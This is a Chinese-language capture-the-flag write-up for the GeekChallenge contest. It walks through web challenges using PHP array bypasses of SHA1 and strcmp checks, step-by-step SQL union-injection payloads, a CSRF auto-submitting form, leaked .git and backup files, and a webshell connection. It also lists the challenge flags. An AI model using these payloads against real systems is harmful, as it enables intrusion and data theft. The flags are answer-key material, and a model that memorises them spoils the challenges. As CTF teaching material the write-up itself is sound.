GeekChallenge
字数 2436 2025-08-24 10:10:13

Web安全挑战赛解题指南

1. Web安全挑战

1.1 朋友的学妹

URL: http://49.234.224.119:7413/
解题步骤:

  1. 右键查看网页源码
  2. 找到flag值: U1lDe0YxQF80c19oNExwZnVsbGxsbGx9
  3. 进行Base64解码得到flag: SYC{F1@_4s_h4Lpfullllll}

1.2 EZwww

URL: http://47.100.46.169:3901/
解题步骤:

  1. 扫描发现www.zip备份文件
  2. 下载解压后得到假flag: SYC{th1s_1s_4_f4ke_fl4g}
  3. 审计index.php发现需要POST提交a=sycl0ver
  4. 正确flag: SYC{Backup_1s_4_good_h4bit_l0l}

1.3 刘壮的黑页

URL: http://106.54.75.217:8080/
解题步骤:

  1. 使用GET提交admin=username
  2. 使用POST提交syclover=password
  3. 得到flag: SYC{d0_y0u_k0nw_GET?}

1.4 欢迎

URL: http://49.234.224.119:8000/
解题步骤:

  1. 使用Burp修改为POST请求
  2. 构造数组绕过SHA1比较: roam1[]=1&roam2[]=2
  3. 发现f1444aagggg.php文件
  4. 访问得到flag: SYC{w31c0m3_t0_5yc_r0@m_php1}

1.5 EZgit

URL: http://47.100.46.169:3902/
解题步骤:

  1. 使用Git_Extract工具扫描.git目录
  2. 得到flag: SYC{I_l0ve_sycl0ver_l0l}

1.6 我是大黑客

URL: http://39.106.144.160:100/
解题步骤:

  1. 发现liuzhuang.php.bak文件
  2. 使用蚁剑连接一句话木马
  3. 在根目录查找flag文件
  4. 得到flag: SYC{1iuzHuang_yyd_G0d!}

1.7 ezbypass

URL: http://49.234.224.119:7417/
解题步骤:

  1. 构造数组绕过strcmp: a[]=1&b=2
  2. 提交非数字变量c=123a
  3. 得到flag: SYC{php_4s_so_funny}

1.8 带恶人六撞

URL: http://49.234.224.119:7415/
解题步骤:

  1. 手注步骤:
    • 判断字段数: ?id=1' order by 4-- q
    • 判断回显点: ?id=-1' union select 1,2,3,4-- q
    • 查询数据库名: ?id=-1' union select 1,2,3,database()-- q
    • 查询表名: ?id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- q
    • 查询字段名: ?id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fllllag'-- q
    • 查询flag: ?id=-1' union select 1,2,3,group_concat(fllllllag) from fllllag-- q
  2. 得到flag: SYC{liuzhuang 4s @_G00d_m@n}

1.9 flagshop

URL: http://173.82.206.142:8005/index.php
解题步骤:

  1. 使用admin/admin登录
  2. 构造CSRF攻击脚本:
<form action="http://173.82.206.142:8005/transfer.php" method="POST">
  <input type="hidden" name="target" value="re1wn"/>
  <input type="hidden" name="money" value="100000000000000000000000000000"/>
  <input type="hidden" name="messages" value="nihao"/>
</form>
<script>document.forms[0].submit();</script>
  1. 提交报告让管理员访问
  2. 得到flag: SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}

1.10 忏悔的刘壮

URL: http://120.79.197.4:5000/do_answer
解题步骤:

  1. 编写爬虫脚本利用cookie中的答案:
import requests
def request_func(req):
    request_n = request.post("http://120.79.197.4:5000/check", data=req.cookies)
    print(request_n.text)
    return request_n

request = requests.session()
req = request.get("http://120.79.197.4:5000/")
req2 = request.post("http://120.79.197.4:5000/check", data=req.cookies)
print(req2.text)
need_req = request_func(req2)
i = 0
while i < 20:
    i += 1
    need_req = request_func(need_req)
  1. 得到flag: SYC{this_is_your_flag}

2. 杂项(Misc)

2.1 壮言壮语

解题步骤:

  1. 使用佛文解密网站(http://www.keyfc.net/bbs/tools/tudoucode.aspx)
  2. 解码得到flag: SYC{i_l0ve_Japanese_wife}

3. 密码学(Crypto)

3.1 铠甲与萨满

解题步骤:

  1. 使用凯撒密码解密(https://www.atoolbox.net/Tool.php?Id=778)
  2. 解密两次得到flag: SYC{liuzhuangliuzhuang_bangbangbang}

关键知识点总结

  1. 源码审计: 查看网页源码是基础但重要的第一步
  2. 敏感文件泄露: 备份文件(.zip, .bak)、版本控制文件(.git)
  3. HTTP方法: GET/POST请求的区别与利用
  4. PHP特性:
    • 数组绕过SHA1比较
    • strcmp函数特性
    • 弱类型比较
  5. SQL注入: 联合查询获取数据库信息
  6. CSRF攻击: 构造恶意表单诱导管理员操作
  7. 自动化脚本: 使用Python编写爬虫自动化操作
  8. 密码学: 凯撒密码、佛文编码等古典密码

工具推荐

  1. Burp Suite: 抓包改包工具
  2. Git_Extract: .git目录泄露利用工具
  3. 蚁剑: 网站管理工具
  4. Python requests库: 编写自动化脚本
  5. 在线解密网站: 佛文、凯撒密码等
Web安全挑战赛解题指南 1. Web安全挑战 1.1 朋友的学妹 URL : http://49.234.224.119:7413/ 解题步骤 : 右键查看网页源码 找到flag值: U1lDe0YxQF80c19oNExwZnVsbGxsbGx9 进行Base64解码得到flag: SYC{F1@_4s_h4Lpfullllll} 1.2 EZwww URL : http://47.100.46.169:3901/ 解题步骤 : 扫描发现 www.zip 备份文件 下载解压后得到假flag: SYC{th1s_1s_4_f4ke_fl4g} 审计 index.php 发现需要POST提交 a=sycl0ver 正确flag: SYC{Backup_1s_4_good_h4bit_l0l} 1.3 刘壮的黑页 URL : http://106.54.75.217:8080/ 解题步骤 : 使用GET提交 admin=username 使用POST提交 syclover=password 得到flag: SYC{d0_y0u_k0nw_GET?} 1.4 欢迎 URL : http://49.234.224.119:8000/ 解题步骤 : 使用Burp修改为POST请求 构造数组绕过SHA1比较: roam1[]=1&roam2[]=2 发现 f1444aagggg.php 文件 访问得到flag: SYC{w31c0m3_t0_5yc_r0@m_php1} 1.5 EZgit URL : http://47.100.46.169:3902/ 解题步骤 : 使用Git_ Extract工具扫描 .git 目录 得到flag: SYC{I_l0ve_sycl0ver_l0l} 1.6 我是大黑客 URL : http://39.106.144.160:100/ 解题步骤 : 发现 liuzhuang.php.bak 文件 使用蚁剑连接一句话木马 在根目录查找flag文件 得到flag: SYC{1iuzHuang_yyd_G0d!} 1.7 ezbypass URL : http://49.234.224.119:7417/ 解题步骤 : 构造数组绕过strcmp: a[]=1&b=2 提交非数字变量 c=123a 得到flag: SYC{php_4s_so_funny} 1.8 带恶人六撞 URL : http://49.234.224.119:7415/ 解题步骤 : 手注步骤: 判断字段数: ?id=1' order by 4-- q 判断回显点: ?id=-1' union select 1,2,3,4-- q 查询数据库名: ?id=-1' union select 1,2,3,database()-- q 查询表名: ?id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- q 查询字段名: ?id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fllllag'-- q 查询flag: ?id=-1' union select 1,2,3,group_concat(fllllllag) from fllllag-- q 得到flag: SYC{liuzhuang 4s @_G00d_m@n} 1.9 flagshop URL : http://173.82.206.142:8005/index.php 解题步骤 : 使用admin/admin登录 构造CSRF攻击脚本: 提交报告让管理员访问 得到flag: SYC{cross_s1t3_r3q43st_4orgery_1s_44nny} 1.10 忏悔的刘壮 URL : http://120.79.197.4:5000/do_ answer 解题步骤 : 编写爬虫脚本利用cookie中的答案: 得到flag: SYC{this_is_your_flag} 2. 杂项(Misc) 2.1 壮言壮语 解题步骤 : 使用佛文解密网站(http://www.keyfc.net/bbs/tools/tudoucode.aspx) 解码得到flag: SYC{i_l0ve_Japanese_wife} 3. 密码学(Crypto) 3.1 铠甲与萨满 解题步骤 : 使用凯撒密码解密(https://www.atoolbox.net/Tool.php?Id=778) 解密两次得到flag: SYC{liuzhuangliuzhuang_bangbangbang} 关键知识点总结 源码审计 : 查看网页源码是基础但重要的第一步 敏感文件泄露 : 备份文件(.zip, .bak)、版本控制文件(.git) HTTP方法 : GET/POST请求的区别与利用 PHP特性 : 数组绕过SHA1比较 strcmp函数特性 弱类型比较 SQL注入 : 联合查询获取数据库信息 CSRF攻击 : 构造恶意表单诱导管理员操作 自动化脚本 : 使用Python编写爬虫自动化操作 密码学 : 凯撒密码、佛文编码等古典密码 工具推荐 Burp Suite : 抓包改包工具 Git_ Extract : .git目录泄露利用工具 蚁剑 : 网站管理工具 Python requests库 : 编写自动化脚本 在线解密网站 : 佛文、凯撒密码等